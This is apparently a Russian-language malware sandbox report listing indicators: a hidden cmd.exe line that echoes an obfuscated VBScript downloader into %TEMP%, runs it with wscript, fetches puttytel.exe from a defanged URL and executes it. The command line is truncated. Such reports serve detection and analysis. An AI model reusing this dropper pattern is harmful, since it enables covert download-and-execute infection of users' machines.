Техническая информация
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO H6d= "http://th#.#arth.li/~sgtatham/putty/0.63/x86/puttytel.exe">>Z3i.VBS &@ECHO Y2s = R4y("inmmrm^eG^q^")>>Z3i.VBS &@ECHO Set F6j = CreateObject(R4y("flqfeKGqfeammi"))>>Z3...
- %TEMP%\z3i.vbs
- %TEMP%\puttytel.exe
- %TEMP%\z3i.vbs
- http://th#.#arth.li/~sgtatham/putty/0.63/x86/puttytel.exe
- DNS ASK th#.#arth.li
- '<SYSTEM32>\wscript.exe' "%TEMP%\Z3i.VBS"
- '%TEMP%\puttytel.exe'
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO H6d= "http://th#.#arth.li/~sgtatham/putty/0.63/x86/puttytel.exe">>Z3i.VBS &@ECHO Y2s = R4y("inmmrm^eG^q^")>>Z3i.VBS &@ECHO Set F6j = CreateObject(R4y("flqfeKGqfeammi"))>>Z3...' (со скрытым окном)
- '<SYSTEM32>\timeout.exe' 13